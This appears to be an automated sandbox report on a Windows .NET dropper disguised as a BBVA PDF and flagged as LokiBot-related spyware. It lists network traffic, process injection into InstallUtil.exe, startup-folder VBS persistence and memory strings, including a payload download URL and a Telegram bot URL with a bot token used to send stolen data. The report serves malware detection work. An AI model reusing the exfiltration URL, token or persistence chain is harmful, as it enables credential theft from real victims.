            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.net/C
            Source: InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://showip.net/J
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://alcomax.com.co
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://alcomax.com.co/Rzbiaxwk.wav
            Source: BBVA-P53269 .pdf.exe, AllData.exe.4.dr | String found in binary or memory: https://alcomax.com.co/Rzbiaxwk.wav1Dnlk3oIZWU60R8dJBQwwXQ==
            Source: InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/
            Source: InstallUtil.exe, 0000000B.00000002.3751602429.0000000004093000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.00000000013DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/t
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
            Source: InstallUtil.exe, 00000006.00000002.3749351723.0000000000CA6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3750651100.0000000003DA7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
            Source: unknown | Network traffic detected: HTTP traffic on port 60443 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60420 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60414 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60381
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60380
            Source: unknown | Network traffic detected: HTTP traffic on port 60392 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60372 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60411
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60410
            Source: unknown | Network traffic detected: HTTP traffic on port 60395 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60408 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60452 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60372
            Source: unknown | Network traffic detected: HTTP traffic on port 60389 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60400 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60419
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60418
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60417
            Source: unknown | Network traffic detected: HTTP traffic on port 60437 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60416
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60415
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60414
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60413
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60379
            Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60412
            Source: unknown | Network traffic detected: HTTP traffic on port 60419 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60392
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60391
            Source: unknown | Network traffic detected: HTTP traffic on port 60411 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60390
            Source: unknown | Network traffic detected: HTTP traffic on port 60446 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60389
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60422
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60388
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60421
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60387
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60420
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60386
            Source: unknown | Network traffic detected: HTTP traffic on port 49915 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60385
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60384
            Source: unknown | Network traffic detected: HTTP traffic on port 60426 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60383
            Source: unknown | Network traffic detected: HTTP traffic on port 60432 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60382
            Source: unknown | Network traffic detected: HTTP traffic on port 60405 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60429
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60428
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60427
            Source: unknown | Network traffic detected: HTTP traffic on port 60386 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60426
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60425
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60424
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60423
            Source: unknown | Network traffic detected: HTTP traffic on port 60445 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60412 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60433
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60399
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60432
            Source: unknown | Network traffic detected: HTTP traffic on port 60397 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60398
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60431
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60397
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60430
            Source: unknown | Network traffic detected: HTTP traffic on port 60454 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60396
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60395
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60394
            Source: unknown | Network traffic detected: HTTP traffic on port 60425 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60393
            Source: unknown | Network traffic detected: HTTP traffic on port 60406 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60431 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60439
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60438
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60437
            Source: unknown | Network traffic detected: HTTP traffic on port 60439 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60436
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60435
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49954
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60434
            Source: unknown | Network traffic detected: HTTP traffic on port 60383 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60417 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60440 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60423 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60448 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60391 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60444
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60443
            Source: unknown | Network traffic detected: HTTP traffic on port 60394 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60428 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60442
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60441
            Source: unknown | Network traffic detected: HTTP traffic on port 60403 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60440
            Source: unknown | Network traffic detected: HTTP traffic on port 60434 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60451 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60388 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60449
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60448
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60447
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60446
            Source: unknown | Network traffic detected: HTTP traffic on port 60380 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60445
            Source: unknown | Network traffic detected: HTTP traffic on port 60418 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60424 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60447 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60455
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60454
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60453
            Source: unknown | Network traffic detected: HTTP traffic on port 60456 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60452
            Source: unknown | Network traffic detected: HTTP traffic on port 60427 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60433 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60451
            Source: unknown | Network traffic detected: HTTP traffic on port 60399 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60410 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60450
            Source: unknown | Network traffic detected: HTTP traffic on port 60404 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60456
            Source: unknown | Network traffic detected: HTTP traffic on port 60442 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60385 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60415 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60421 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknown | Network traffic detected: HTTP traffic on port 49954 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60379 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60393 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60453 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60396 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60409 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60436 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60401 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60382 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60384 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60416 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60441 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60422 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60390 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60449 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60429 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60402 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60450 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60435 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49915
            Source: unknown | Network traffic detected: HTTP traffic on port 60387 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60381 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60444 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60413 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60409
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60400
            Source: unknown | Network traffic detected: HTTP traffic on port 60455 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60398 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60407 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 60430 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60408
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60407
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60406
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60405
            Source: unknown | Network traffic detected: HTTP traffic on port 60438 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60404
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60403
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60402
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60401
            Source: unknown | HTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.10:49704 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.10:49772 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49915 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:60380 version: TLS 1.2

            System Summary

            Source: 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
            Source: 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
            Source: initial sampleStatic PE information: Filename: BBVA-P53269 .pdf.exe
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017BCE684_2_017BCE68
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017BD1184_2_017BD118
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017B17A04_2_017B17A0
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017B23834_2_017B2383
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017BC4E04_2_017BC4E0
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_017B19D04_2_017B19D0
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_06F200404_2_06F20040
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_06F2001E4_2_06F2001E
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_06F3E8684_2_06F3E868
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0042DACC6_2_0042DACC
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_0072CE689_2_0072CE68
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_0072D1189_2_0072D118
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_007223839_2_00722383
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_0072C4E09_2_0072C4E0
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_062700069_2_06270006
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_062700409_2_06270040
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_0628E8689_2_0628E868
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000035B3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefirebases.exe vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000000.1278107996.0000000000D42000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenameWxrcmozn.exe2 vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314117067.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefirebases.exe vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefirebases.exe vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.0000000004299000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWxrcmozn.exe2 vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameZzrnngjehh.dll" vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.00000000030F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1336485810.00000000061D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameZzrnngjehh.dll" vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe | Binary or memory string: OriginalFilenameWxrcmozn.exe2 vs BBVA-P53269 .pdf.exe
Source: BBVA-P53269 .pdf.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: BBVA-P53269 .pdf.exe, EditorModel.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.BBVA-P53269 .pdf.exe.43cd9f8.1.raw.unpack, EditorModel.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: BBVA-P53269 .pdf.exe, FactoryExplorer.cs | Task registration methods: 'CreateRemoteTask'
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
Source: 4.2.BBVA-P53269 .pdf.exe.43cd9f8.1.raw.unpack, FactoryExplorer.cs | Task registration methods: 'CreateRemoteTask'
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 00000006.00000002.3746600843.0000000000401000.00000040.00000400.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: F*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe | Binary or memory string: B*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe, 00000006.00000002.3746600843.000000000046A000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3746594015.0000000000451000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: B*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp %m
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@8/16@3/3
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs"
Source: BBVA-P53269 .pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BBVA-P53269 .pdf.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: LoginData.6.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BBVA-P53269 .pdf.exe | Virustotal: Detection: 40%
Source: BBVA-P53269 .pdf.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | File read: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe"
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\AllData.exe "C:\Users\user\AppData\Roaming\AllData.exe"
Source: C:\Users\user\AppData\Roaming\AllData.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\AllData.exe "C:\Users\user\AppData\Roaming\AllData.exe"
Source: C:\Users\user\AppData\Roaming\AllData.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: cryptsp.dll
